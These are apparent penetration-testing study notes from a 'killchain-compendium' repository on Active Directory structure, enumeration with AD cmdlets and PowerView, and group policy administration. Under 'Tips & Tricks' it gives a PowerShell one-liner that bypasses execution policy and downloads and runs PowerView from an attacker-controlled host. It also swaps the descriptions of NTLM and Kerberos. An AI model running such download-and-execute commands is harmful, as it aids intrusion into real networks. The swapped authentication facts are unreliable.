whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
killchain-compendium/Miscellaneous/Active Directory/active_directory.md

6.2 KiB
Raw Blame History

Active Directory Enumeration

  • Offers authentication in the form of centralized IAM a.k.a SSO and authentication via Policy Management

  • There are user accounts acting on machine accounts (services), in general

  • Consists of

    • Domain Controller
    • Organizational Units, (security principals) can be common user or machine accounts
      • Users
      • Groups
    • Trusts
    • AD Domains
    • AD Forest
    • Policies

  • Administrative accounts are

    • Domain Admin
    • Enterprise Admin
    • Schema Admin
    • Server Operator
    • Account Operator

Domain Controller

  • AD Domain Services (AD DS) data store stores all objects on the network
  • Authentication and authorization
  • Update replication / sync with other domain controllers in the forest
  • Administration of domain resources

AD DS Store

  • Database of directory info such as users, groups and services
    • ntdis.dit contains the information, including password hashes
    • SystemRoot%\NTDS

Forest

Consists of the following objects

  • Trees, hierarchy of domains in the AD Domain Services
  • Domains, groups of objects
  • Organizational Units (OU), containers of objects such as groups, users, printers and other resources
  • Trusts, allows users to access resources in a different domain
  • Objects users, groups, printers, computers or shares
  • Domain Services, DNS, LLMNR, SMB
  • Domain Schema, Rules for object creation

Users

  • Domain Admin, DC access

  • Server Accounts, service maintenance, may have admin permissions

  • Local Admin, administrative persmission on an object but not the DC

  • Domain Users, average user account on a local machine which may have admin permissions

  • Machine users,

    • Machine accounts have local administrational permissions
    • Can be recognized by a $ at the end of the ID
    • Their passwords are rotated on a schedule
    • Passwords are 120 characters long per default

Security Groups

Important groups are the following

  • Domain Controllers, every DC in the domain

  • Domain Admins, dc access

  • Server Operators, administration of domain controllers but not groups

  • Backup Operators, full read access to any file

  • Account Operators, able to provision accounts

  • Domain Users, every user account in the domain

  • Domain Computers, every machine account in the domain

  • Security Groups doc

Policies

  • Rule sets
  • Apply to a domain
  • Enable or disables services on a domain basis, like antivirus and malware scanning
    • Disable Windows Defender
    • Communication signing, e.g. SMB

Domain Services

  • LDAP
  • Certificates handling for services, CRL
  • DNS, LLMNR, NBT-NS

Authentication

  • NTLM, ticket granting service
  • Kerberos, challenge/response via hashes

Enumration

  • Cmdlets on Domain Controller

  • Get some help, Get-Help Get-Command -Examples, Get-Command Get-*

  • From ActiveDirectory module

Import-Module Active-Directory
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster
Get-ADForest | Select-Object Domains
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
  • systeminfo | findstr Domain
  • Get-ADUser -filter *
  • Use found CN and DC and specify
  • Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"

Powerview Module

Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetDomainController
Get-NetForest
Get-NetDomainTrust

DNS

  • Check ip via ipconfig
  • nslookup, then server <LocalIP> and zone transfer via
ls -d <Domain>

Tips & Tricks

  • Download and execute in one line
powershell -exec bypass -c  "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi
ew.ps1'); Get-NetUser | select samaccountname, description"

Configuration

Configure Users and Groups

  • Use Start -> "Active Directory and Computers" to provision AD objects via organizational units (OU)

  • A set of users as a group with set policies are defined as organizational unit (OU)

  • A user is unique to a single OU

  • Default OUs are the following

    • Builtin
    • Users, user accounts
    • Computers, machine accounts
    • Domain Controllers, contains DC in the domain
    • Managed Service Accounts, service accounts in the domain

  • To delete a OU use View -> Advanced Features. Properties menu of the OU via right click shows the checkbox Protect object from accidental deletion under Object tab -> uncheck it and delete the OU afterwards

  • To delegate open properties with right click -> Next -> Delegate Control -> Add -> Choose user and OK -> Next -> Choose tasks to delegate -> Next -> Finish

  • To change a user password via powershell

Set-ADAccountPassword <user> -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
  • To let the user change the password at the next login
Set-ADUser  -ChangePasswordAtLogon $true -Identity <username> -Verbose

Managing Machine Users

  • Computer OU should be split into at least Workstations and Servers

Group Policies

  • Group Policy Objects are applied to OUs

  • Use the application Group Policy Management to apply policies to UOs

  • GPOs under Group Policy Objects for the specific domain can be modified. These will be inherited to all UOs. You can see the links to the OUs on the right hand site if you click the GPO on the left

  • Child OUs inherit the policies from parent UOs

  • Security Filters can be set as well here

  • The Settings tab of a policy shows its actual content

  • Right click on a Policy -> Edit to change the content of the policy. There are templates for multiple common policies

  • SYSVOL as a SMB share is used to distribute the GPOs in the domain, it maps to C:\Windows\SYSVOL\sysvol\ on the domain controller

  • To force an update of changed policies across the domain do

gpupdate /force